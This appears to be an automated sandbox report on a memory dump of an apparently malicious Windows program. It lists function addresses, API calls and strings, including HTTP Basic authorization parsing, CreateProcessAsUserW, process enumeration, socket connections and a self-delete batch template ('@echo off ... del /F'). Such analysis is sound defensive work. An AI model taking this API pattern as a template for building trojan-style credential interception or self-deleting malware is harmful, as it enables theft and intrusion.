Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02832DBA, Relevance: 6.9, APIs: 2, Strings: 1, Instructions: 63

APIs

WSAGetLastError.WS2_32 ref: 02832DF0
WSASetLastError.WS2_32(00002775), ref: 02832E54

Strings

, xrefs: 02832E18

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02811D27, Relevance: 6.5, APIs: 5, Instructions: 213

APIs

memset.MSVCRT ref: 02811DCD

Part of subcall function 0280F1EF: memcmp.MSVCRT ref: 0280F1FB

Part of subcall function 0280F040: memcmp.MSVCRT ref: 0280F0B6

Part of subcall function 0280EEA9: memcpy.MSVCRT ref: 0280EED2

Part of subcall function 0280EDAE: memcpy.MSVCRT ref: 0280EDF9

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

memset.MSVCRT ref: 02811E71
memcpy.MSVCRT ref: 02811E84
memcpy.MSVCRT ref: 02811EA6
memcpy.MSVCRT ref: 02811EC6

Part of subcall function 0283046D: EnterCriticalSection.KERNEL32(028430F4,?,?,0280E3BD,00000000,?,?,00000001), ref: 0283047A
Part of subcall function 0283046D: LeaveCriticalSection.KERNEL32(028430F4,?,?,0280E3BD,00000000,?,?,00000001), ref: 02830488

Part of subcall function 0280C907: EnterCriticalSection.KERNEL32(?,?,00000002,00000001,?,00000000,0280CB5E,?), ref: 0280C961
Part of subcall function 0280C907: InterlockedIncrement.KERNEL32 ref: 0280C99E
Part of subcall function 0280C907: SetEvent.KERNEL32 ref: 0280C9BC
Part of subcall function 0280C907: LeaveCriticalSection.KERNEL32(?,?,?,00000002,00000001,?,00000000,0280CB5E,?), ref: 0280C9C9

Part of subcall function 0280F825: InterlockedDecrement.KERNEL32(00000004,00000004,00000000), ref: 0280F82D

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02815AD5, Relevance: 6.5, APIs: 3, Instructions: 10

APIs

GetLastError.KERNEL32(?,0280BA1E), ref: 02815AD6
TlsSetValue.KERNEL32(00000000), ref: 02815AE6
SetLastError.KERNEL32(?,?,0280BA1E), ref: 02815AED

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0280E6AF, Relevance: 6.4, APIs: 2, Strings: 1, Instructions: 47

APIs

GetFileAttributesW.KERNEL32(C:\Documents and Settings\Administrator\Local Settings\Application Data), ref: 0280E6BC
CreateFileW.KERNEL32(C:\Documents and Settings\Administrator\Local Settings\Application Data,80000000,00000007,00000000,00000003,?,00000000), ref: 0280E6DC

Part of subcall function 0280E348: CloseHandle.KERNEL32 ref: 0280E354

Part of subcall function 0280E5F1: memcpy.MSVCRT ref: 0280E632
Part of subcall function 0280E5F1: memcpy.MSVCRT ref: 0280E645
Part of subcall function 0280E5F1: memcpy.MSVCRT ref: 0280E658
Part of subcall function 0280E5F1: memcpy.MSVCRT ref: 0280E663
Part of subcall function 0280E5F1: GetFileTime.KERNEL32(?,?,?), ref: 0280E687
Part of subcall function 0280E5F1: memcpy.MSVCRT ref: 0280E69D

Strings

C:\Documents and Settings\Administrator\Local Settings\Application Data, xrefs: 0280E6B2 0280E6B3 0280E6B9 0280E6DB

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 028192DF, Relevance: 6.4, APIs: 2, Strings: 1, Instructions: 46

APIs

memset.MSVCRT ref: 028192F2
InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 02819314

Part of subcall function 028193E9: SetLastError.KERNEL32(00000008,00003A98,?,00000000,02819326,?,?,00000000), ref: 02819412
Part of subcall function 028193E9: memcpy.MSVCRT ref: 02819432
Part of subcall function 028193E9: memcpy.MSVCRT ref: 0281946A
Part of subcall function 028193E9: memcpy.MSVCRT ref: 02819482

Strings

<, xrefs: 0281930D

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 028195BE, Relevance: 6.4, APIs: 2, Strings: 1, Instructions: 45

APIs

Part of subcall function 02833629: GetTokenInformation.ADVAPI32(?,00000001,00000000,00000000,?), ref: 0283363C
Part of subcall function 02833629: GetLastError.KERNEL32(?,02815032,?,00000008,?,?,?,?,?,?,028249E1,?,?,00000001), ref: 02833646
Part of subcall function 02833629: GetTokenInformation.ADVAPI32(?,00000001,?,?,?), ref: 0283366E

EqualSid.ADVAPI32(?,5B867A00), ref: 028195E1

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

Part of subcall function 028152FF: LoadLibraryA.KERNEL32(userenv.dll), ref: 0281530F
Part of subcall function 028152FF: GetProcAddress.KERNEL32(?,CreateEnvironmentBlock), ref: 0281532D
Part of subcall function 028152FF: GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 02815339
Part of subcall function 028152FF: memset.MSVCRT ref: 02815379
Part of subcall function 028152FF: CreateProcessAsUserW.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?), ref: 028153C6
Part of subcall function 028152FF: CloseHandle.KERNEL32(?), ref: 028153DA
Part of subcall function 028152FF: CloseHandle.KERNEL32(?), ref: 028153E0
Part of subcall function 028152FF: FreeLibrary.KERNEL32 ref: 028153F4

CloseHandle.KERNEL32(00000001), ref: 02819628

Strings

"%s", xrefs: 028195F5

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 028267C9, Relevance: 6.4, APIs: 5, Instructions: 160

APIs

Part of subcall function 0280F1A8: EnterCriticalSection.KERNEL32(02843510,?,0280C78E,?,?,?,00000001,02824DE8,00000001), ref: 0280F1B8
Part of subcall function 0280F1A8: LeaveCriticalSection.KERNEL32(02843510,?,0280C78E,?,?,?,00000001,02824DE8,00000001), ref: 0280F1E2

memcmp.MSVCRT ref: 028267F4

Part of subcall function 0282D95F: GetSystemTime.KERNEL32(?), ref: 0282D969

memcmp.MSVCRT ref: 02826859

Part of subcall function 02816A19: HeapAlloc.KERNEL32(00000008,?,?,00000000,0282CB50,?,00000000,00000001,00000001,0282CB1A,?,028154E4,?,@echo off%sdel /F "%s",?,?), ref: 02816A43
Part of subcall function 02816A19: HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,0282CB50,?,00000000,00000001,00000001,0282CB1A,?,028154E4,?,@echo off%sdel /F "%s",?), ref: 02816A56

memset.MSVCRT ref: 028268ED
memcpy.MSVCRT ref: 0282691A
memcmp.MSVCRT ref: 02826952

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0280EE09, Relevance: 6.4, APIs: 4, Instructions: 62

APIs

memset.MSVCRT ref: 0280EE1C
memcpy.MSVCRT ref: 0280EE37
memcpy.MSVCRT ref: 0280EE5F
memcpy.MSVCRT ref: 0280EE83

Part of subcall function 0280EDAE: memcpy.MSVCRT ref: 0280EDF9

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02817DF0, Relevance: 6.4, APIs: 3, Instructions: 56

APIs

EnterCriticalSection.KERNEL32(00000014,?,?,?,?,0280B9D5,00000003,?,00000000,00000000), ref: 02817E07
InterlockedIncrement.KERNEL32(?,?), ref: 02817E5B
LeaveCriticalSection.KERNEL32(00000014,?,?,?,00000000,?,?,?,?,0280B9D5,00000003,?,00000000,00000000), ref: 02817E62

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0280F5E9, Relevance: 6.3, APIs: 4, Instructions: 168

APIs

Part of subcall function 02816997: HeapAlloc.KERNEL32(00000000,00000024,?,028117BF,?,00000000,02824986,?,?,00000001), ref: 028169A8

Part of subcall function 0282CFF2: memset.MSVCRT ref: 0282D01A

memcpy.MSVCRT ref: 0280F79E

Part of subcall function 0282D06B: CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 0282D07B

memcpy.MSVCRT ref: 0280F719
memcpy.MSVCRT ref: 0280F731

Part of subcall function 0282D17E: memcpy.MSVCRT ref: 0282D19E
Part of subcall function 0282D17E: memcpy.MSVCRT ref: 0282D1CA

memcpy.MSVCRT ref: 0280F78D

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02820181, Relevance: 6.3, APIs: 1, Strings: 2, Instructions: 91

APIs

Part of subcall function 02833CFF: StrCmpNA.SHLWAPI(Basic ,?,00000000), ref: 02833D14
Part of subcall function 02833CFF: lstrcmpA.KERNEL32(Basic ,?,028201C0,00000006,Authorization,?,?,?), ref: 02833D1E

StrChrA.SHLWAPI(?,0000003A), ref: 02820212

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

Strings

Authorization, xrefs: 02820191
Basic , xrefs: 028201B6

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0280A509, Relevance: 6.3, APIs: 2, Strings: 1, Instructions: 66

APIs

Part of subcall function 02809F72: memcpy.MSVCRT ref: 02809F80

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 0280A54A

Part of subcall function 0282432D: memcpy.MSVCRT ref: 0282439E
Part of subcall function 0282432D: PathRemoveBackslashW.SHLWAPI ref: 028243A8
Part of subcall function 0282432D: memcpy.MSVCRT ref: 028243F1
Part of subcall function 0282432D: memcpy.MSVCRT ref: 0282441E
Part of subcall function 0282432D: PathRemoveBackslashW.SHLWAPI(?), ref: 02824428

PathRenameExtensionW.SHLWAPI(?,?), ref: 0280A59B

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 0280A56B

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0280BBAD, Relevance: 6.2, APIs: 2, Strings: 1, Instructions: 46

APIs

Part of subcall function 0280B6D0: EnterCriticalSection.KERNEL32(02843510,?,0280BBBB,02991E90,?,02811983,?,?,?,?,?,?,028248EB,?,?,00000000), ref: 0280B6E0
Part of subcall function 0280B6D0: LeaveCriticalSection.KERNEL32(02843510,?,02811983,?,?,?,?,?,?,028248EB,?,?,00000000), ref: 0280B715

VerQueryValueW.VERSION(?,028075E4,?,?,02991E90,?,02811983,?,?,?,?,?,?,028248EB), ref: 0280BBCE
GetModuleHandleW.KERNEL32(?), ref: 0280BC0F

Part of subcall function 0280BC27: PathFindFileNameW.SHLWAPI(00000000), ref: 0280BC6B

Strings

4, xrefs: 0280BBD9

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 028246CB, Relevance: 6.2, APIs: 1, Strings: 2, Instructions: 34

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0282470E

Part of subcall function 02833D5A: memcpy.MSVCRT ref: 02833D94

Part of subcall function 02824214: EnterCriticalSection.KERNEL32(02843510,?,02842DB4,00000000,00000006,?,0282BBC2,02842DB4,?,?,00000000), ref: 0282422E
Part of subcall function 02824214: LeaveCriticalSection.KERNEL32(02843510,?,02842DB4,00000000,00000006,?,0282BBC2,02842DB4,?,?,00000000), ref: 02824261
Part of subcall function 02824214: CoTaskMemFree.OLE32(00000000), ref: 028242F6
Part of subcall function 02824214: PathRemoveBackslashW.SHLWAPI(?), ref: 02824303
Part of subcall function 02824214: SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 0282431A

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 028246D9
C:\Documents and Settings\Administrator\Local Settings\Application Data, xrefs: 028246EE

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0281CE9F, Relevance: 6.2, APIs: 4, Instructions: 222

APIs

Part of subcall function 02815A4F: GetLastError.KERNEL32(?,?,0280B9B4), ref: 02815A51
Part of subcall function 02815A4F: TlsGetValue.KERNEL32(?,?,0280B9B4), ref: 02815A6E
Part of subcall function 02815A4F: TlsSetValue.KERNEL32(00000001), ref: 02815A80
Part of subcall function 02815A4F: SetLastError.KERNEL32(?,?,0280B9B4), ref: 02815A90

Part of subcall function 02817DF0: EnterCriticalSection.KERNEL32(00000014,?,?,?,?,0280B9D5,00000003,?,00000000,00000000), ref: 02817E07
Part of subcall function 02817DF0: InterlockedIncrement.KERNEL32(?,?), ref: 02817E5B
Part of subcall function 02817DF0: LeaveCriticalSection.KERNEL32(00000014,?,?,?,00000000,?,?,?,?,0280B9D5,00000003,?,00000000,00000000), ref: 02817E62

Part of subcall function 02815AD5: GetLastError.KERNEL32(?,0280BA1E), ref: 02815AD6
Part of subcall function 02815AD5: TlsSetValue.KERNEL32(00000000), ref: 02815AE6
Part of subcall function 02815AD5: SetLastError.KERNEL32(?,?,0280BA1E), ref: 02815AED

InternetQueryOptionA.WININET(?,0000002D,?,?), ref: 0281CFCC
InternetSetOptionA.WININET(?,0000002D,?,00000000), ref: 0281CFE9
memcpy.MSVCRT ref: 0281D066

Part of subcall function 0280F971: memset.MSVCRT ref: 0280F97D

Part of subcall function 02816997: HeapAlloc.KERNEL32(00000000,00000024,?,028117BF,?,00000000,02824986,?,?,00000001), ref: 028169A8

memcpy.MSVCRT ref: 0281D0FE

Part of subcall function 0281CC9C: SetLastError.KERNEL32(00000008,00001000,?,?,?,00000001,?,?,?,?,?,00000000,?,?,00000001), ref: 0281CDAF

Part of subcall function 0280F825: InterlockedDecrement.KERNEL32(00000004,00000004,00000000), ref: 0280F82D

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 028193E9, Relevance: 6.2, APIs: 4, Instructions: 70

APIs

Part of subcall function 028169B0: HeapAlloc.KERNEL32(00000008,?,?,0281519B,?,?,?,?,028246A1,?,028249A5,?,?,00000001), ref: 028169C1

SetLastError.KERNEL32(00000008,00003A98,?,00000000,02819326,?,?,00000000), ref: 02819412
memcpy.MSVCRT ref: 02819432
memcpy.MSVCRT ref: 0281946A
memcpy.MSVCRT ref: 02819482

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02811BDD, Relevance: 6.2, APIs: 2, Strings: 1, Instructions: 17

APIs

#6.OLEAUT32 ref: 02811BE7
#2.OLEAUT32(ProhibitDTD), ref: 02811BF5

Strings

ProhibitDTD, xrefs: 02811BF0

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0280F20B, Relevance: 6.2, APIs: 4, Instructions: 63

APIs

memset.MSVCRT ref: 0280F219
memcpy.MSVCRT ref: 0280F23A
memcpy.MSVCRT ref: 0280F260
memcpy.MSVCRT ref: 0280F284

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02831E96, Relevance: 6.2, APIs: 4, Instructions: 60

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,0280CAC8,?,?,00000000,?,?,?,00000000,0000EA60), ref: 02831E9C
memcmp.MSVCRT ref: 02831EC8
memcpy.MSVCRT ref: 02831F13
LeaveCriticalSection.KERNEL32(?,00000000,?,?,?,00000000,0000EA60), ref: 02831F1F

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02821215, Relevance: 6.2, APIs: 4, Instructions: 38

APIs

memset.MSVCRT ref: 0282122B
InitializeCriticalSection.KERNEL32(02842910), ref: 0282123B

Part of subcall function 02809F72: memcpy.MSVCRT ref: 02809F80

memset.MSVCRT ref: 0282126A
InitializeCriticalSection.KERNEL32(028428F0), ref: 02821274

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0281BFCE, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 141

APIs

memcpy.MSVCRT ref: 0281C0ED
GetLastError.KERNEL32(?,?,?,?,?,?,00000001,?,00000000,00000000), ref: 0281C10C

Part of subcall function 0280F825: InterlockedDecrement.KERNEL32(00000004,00000004,00000000), ref: 0280F82D

Part of subcall function 0281CC9C: SetLastError.KERNEL32(00000008,00001000,?,?,?,00000001,?,?,?,?,?,00000000,?,?,00000001), ref: 0281CDAF

Part of subcall function 02815A9B: GetLastError.KERNEL32(?,00000000,0281C683,?,00000000,00000000,?,00000001,?,00000000,00000000,?,?,?,00000000), ref: 02815A9D
Part of subcall function 02815A9B: TlsGetValue.KERNEL32(?,?,00000000), ref: 02815ABA
Part of subcall function 02815A9B: SetLastError.KERNEL32(?,?,00000000,0281C683,?,00000000,00000000,?,00000001,?,00000000,00000000,?,?,?,00000000), ref: 02815ACA

Part of subcall function 02815A4F: GetLastError.KERNEL32(?,?,0280B9B4), ref: 02815A51
Part of subcall function 02815A4F: TlsGetValue.KERNEL32(?,?,0280B9B4), ref: 02815A6E
Part of subcall function 02815A4F: TlsSetValue.KERNEL32(00000001), ref: 02815A80
Part of subcall function 02815A4F: SetLastError.KERNEL32(?,?,0280B9B4), ref: 02815A90

Part of subcall function 02815AD5: GetLastError.KERNEL32(?,0280BA1E), ref: 02815AD6
Part of subcall function 02815AD5: TlsSetValue.KERNEL32(00000000), ref: 02815AE6
Part of subcall function 02815AD5: SetLastError.KERNEL32(?,?,0280BA1E), ref: 02815AED

Part of subcall function 02817DF0: EnterCriticalSection.KERNEL32(00000014,?,?,?,?,0280B9D5,00000003,?,00000000,00000000), ref: 02817E07
Part of subcall function 02817DF0: InterlockedIncrement.KERNEL32(?,?), ref: 02817E5B
Part of subcall function 02817DF0: LeaveCriticalSection.KERNEL32(00000014,?,?,?,00000000,?,?,?,?,0280B9D5,00000003,?,00000000,00000000), ref: 02817E62

Part of subcall function 02817E75: EnterCriticalSection.KERNEL32(0299264C,02992638,00000001,?,02992638,0281C026,00000001,?), ref: 02817E8F
Part of subcall function 02817E75: LeaveCriticalSection.KERNEL32(0299264C,?,?,?), ref: 02817EBE

Strings

d, xrefs: 0281BFE8
n, xrefs: 0281BFF5

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02819067, Relevance: 6.1, APIs: 4, Instructions: 89

APIs

memset.MSVCRT ref: 0281908C

Part of subcall function 02816997: HeapAlloc.KERNEL32(00000000,00000024,?,028117BF,?,00000000,02824986,?,?,00000001), ref: 028169A8

InternetReadFile.WININET(0281388E,?,00001000,?), ref: 028190DE
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 028190BB

Part of subcall function 02816AAB: memcpy.MSVCRT ref: 02816AD1

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

SetLastError.KERNEL32(00000000,?,00001000,?,?,00000000,?,00000001,?,0281388E,?,00000CCA,?,?,00000001), ref: 02819132

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02835A2D, Relevance: 6.1, APIs: 4, Instructions: 85

APIs

Part of subcall function 0283046D: EnterCriticalSection.KERNEL32(028430F4,?,?,0280E3BD,00000000,?,?,00000001), ref: 0283047A
Part of subcall function 0283046D: LeaveCriticalSection.KERNEL32(028430F4,?,?,0280E3BD,00000000,?,?,00000001), ref: 02830488

GetTempFileNameW.KERNEL32(00000426,?,?,?), ref: 02835A84
PathFindFileNameW.SHLWAPI(?), ref: 02835A93
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,?,00000000,00000000), ref: 02835ACC
memcpy.MSVCRT ref: 02835AF1

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 028172C2, Relevance: 6.1, APIs: 4, Instructions: 85

APIs

Part of subcall function 02833993: memcpy.MSVCRT ref: 02833AA4

Part of subcall function 0280E524: SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,?), ref: 0280E534

WriteFile.KERNEL32(?,?,00000005,?,00000000), ref: 0281732F
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02817347
FlushFileBuffers.KERNEL32(?), ref: 02817361
SetEndOfFile.KERNEL32 ref: 0281737B

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

Part of subcall function 0280E4F0: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001), ref: 0280E502

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0282FC7C, Relevance: 6.1, APIs: 4, Instructions: 77

APIs

GetTickCount.KERNEL32 ref: 0282FC87
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,00000002), ref: 0282FC99
memcmp.MSVCRT ref: 0282FCD3
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000002), ref: 0282FD3F

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02832F53, Relevance: 6.1, APIs: 4, Instructions: 74

APIs

WSAEventSelect.WS2_32(?,?,?), ref: 02832F68
WaitForMultipleObjects.KERNEL32(?,?,00000000,?), ref: 02832F9D
WSAEventSelect.WS2_32 ref: 02832FEB
WSASetLastError.WS2_32(?,?,?,?,?,?,00000000,?,?,?,?), ref: 02832FFE

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0280E141, Relevance: 6.1, APIs: 4, Instructions: 65

APIs

GlobalLock.KERNEL32 ref: 0280E16A
EnterCriticalSection.KERNEL32(?,000000FF,00000000), ref: 0280E1A6

Part of subcall function 0280DE64: EnterCriticalSection.KERNEL32(?,?,?,?,?,0280E138,?,?,?,?,?,00000009,00000000), ref: 0280DE7E
Part of subcall function 0280DE64: memcpy.MSVCRT ref: 0280DEEF
Part of subcall function 0280DE64: memcpy.MSVCRT ref: 0280DF13
Part of subcall function 0280DE64: memcpy.MSVCRT ref: 0280DF2A
Part of subcall function 0280DE64: memcpy.MSVCRT ref: 0280DF4A
Part of subcall function 0280DE64: LeaveCriticalSection.KERNEL32 ref: 0280DF65

LeaveCriticalSection.KERNEL32(?,?,02807854,?,000000FF,00000000), ref: 0280E1CC

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

GlobalUnlock.KERNEL32 ref: 0280E1D3

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 028306B6, Relevance: 6.1, APIs: 4, Instructions: 59

APIs

RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00000104,00000000,?,00000000), ref: 028306D4
RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00000103,00000000,?,?), ref: 02830709
RegCloseKey.ADVAPI32(?), ref: 02830718
RegCloseKey.ADVAPI32(?), ref: 02830733

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0282FBE9, Relevance: 6.1, APIs: 4, Instructions: 57

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,00000000,?,0282FEB0,?,?,?,?,00000002), ref: 0282FBF4
GetTickCount.KERNEL32 ref: 0282FC27
memcpy.MSVCRT ref: 0282FC60
LeaveCriticalSection.KERNEL32(?,?,?,?,?,00000000,?,0282FEB0,?,?,?,?,00000002), ref: 0282FC6C

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0280C86A, Relevance: 6.1, APIs: 4, Instructions: 52

APIs

Part of subcall function 0280F825: InterlockedDecrement.KERNEL32(00000004,00000004,00000000), ref: 0280F82D

DeleteCriticalSection.KERNEL32(?,?,?,?,0280C856), ref: 0280C8C2

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

CloseHandle.KERNEL32 ref: 0280C8DA
DeleteCriticalSection.KERNEL32(?,?,?,?,?,0280C856), ref: 0280C8E7
DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,0280C856), ref: 0280C8F0

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0280AA04, Relevance: 6.0, APIs: 4, Instructions: 45

APIs

GetTickCount.KERNEL32 ref: 0280AA11
GetLastInputInfo.USER32(?), ref: 0280AA24
GetLocalTime.KERNEL32(?), ref: 0280AA48

Part of subcall function 0282D979: SystemTimeToFileTime.KERNEL32(?,?), ref: 0282D983

GetTimeZoneInformation.KERNEL32(?), ref: 0280AA60

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02812F57, Relevance: 6.0, APIs: 4, Instructions: 39

APIs

MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,00001CFF), ref: 02812F6C
TranslateMessage.USER32(?), ref: 02812F90
DispatchMessageW.USER32(?), ref: 02812F9B
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 02812FAB

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0281E1B7, Relevance: 6.0, APIs: 4, Instructions: 38

APIs

Part of subcall function 0281568C: TlsSetValue.KERNEL32(00000001,0281E1BD), ref: 02815699

Part of subcall function 0282BEE3: CreateMutexW.KERNEL32(02842974,00000000,?), ref: 0282BF05

Part of subcall function 02824B8D: WaitForSingleObject.KERNEL32(00000000,0281E1D7), ref: 02824B95

GetCurrentThread.KERNEL32 ref: 0281E1DF
SetThreadPriority.KERNEL32 ref: 0281E1E6
WaitForSingleObject.KERNEL32(00001388), ref: 0281E1F8

Part of subcall function 02834181: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 028341A1
Part of subcall function 02834181: Process32FirstW.KERNEL32(?,?), ref: 028341C6
Part of subcall function 02834181: OpenProcess.KERNEL32(00000400,00000000,?), ref: 0283421D
Part of subcall function 02834181: CloseHandle.KERNEL32 ref: 0283423B
Part of subcall function 02834181: GetLengthSid.ADVAPI32(?,?,?,?,?,?,?,00000001), ref: 02834257
Part of subcall function 02834181: memcmp.MSVCRT ref: 0283426F
Part of subcall function 02834181: CloseHandle.KERNEL32(?), ref: 028342E7
Part of subcall function 02834181: Process32NextW.KERNEL32(?,?), ref: 028342F3
Part of subcall function 02834181: CloseHandle.KERNEL32 ref: 02834306

WaitForSingleObject.KERNEL32(00001388), ref: 0281E211

Part of subcall function 02812FB7: ReleaseMutex.KERNEL32 ref: 02812FBB
Part of subcall function 02812FB7: CloseHandle.KERNEL32 ref: 02812FC2

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0280DE15, Relevance: 6.0, APIs: 4, Instructions: 28

APIs

WaitForSingleObject.KERNEL32(?,00007530), ref: 0280DE25
EnterCriticalSection.KERNEL32(?,?,00007530), ref: 0280DE33
LeaveCriticalSection.KERNEL32(?,?,00007530), ref: 0280DE48
WaitForSingleObject.KERNEL32(?,00007530), ref: 0280DE52

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 028313F4, Relevance: 6.0, APIs: 3, Instructions: 50

APIs

getpeername.WS2_32(?,?,?), ref: 02831418
getsockname.WS2_32(?,?,?), ref: 02831430
send.WS2_32(00000000,?,00000008,00000000), ref: 02831461

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02816C17, Relevance: 6.0, APIs: 3, Instructions: 30

APIs

socket.WS2_32(?,00000001,00000006), ref: 02816C23
connect.WS2_32 ref: 02816C40
closesocket.WS2_32 ref: 02816C4B

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02824CA0, Relevance: 5.9, APIs: 2, Strings: 1, Instructions: 79

APIs

memcpy.MSVCRT ref: 02824CC6

Part of subcall function 02810243: CryptDestroyKey.ADVAPI32 ref: 0281025A
Part of subcall function 02810243: CryptImportKey.ADVAPI32(?,?,00000114,00000000,00000000), ref: 02810278

memset.MSVCRT ref: 02824D69

Part of subcall function 0281028F: CryptGetKeyParam.ADVAPI32(?,00000009,?,?,00000000), ref: 028102B0

Part of subcall function 02809A5B: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000), ref: 02809ACA
Part of subcall function 02809A5B: CryptHashData.ADVAPI32(?,?,?,00000000), ref: 02809AEF

Part of subcall function 028102CE: CryptVerifySignatureW.ADVAPI32(?,?,?,?,00000000,00000000,?,?,00000114,?,02824D47), ref: 0281031F

Part of subcall function 02810223: CryptDestroyKey.ADVAPI32 ref: 02810235

Strings

\26}, xrefs: 02824CBE

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0282C3E0, Relevance: 5.7, APIs: 3, Instructions: 40

APIs

lstrlenW.KERNEL32(02807C5C), ref: 0282C3FC
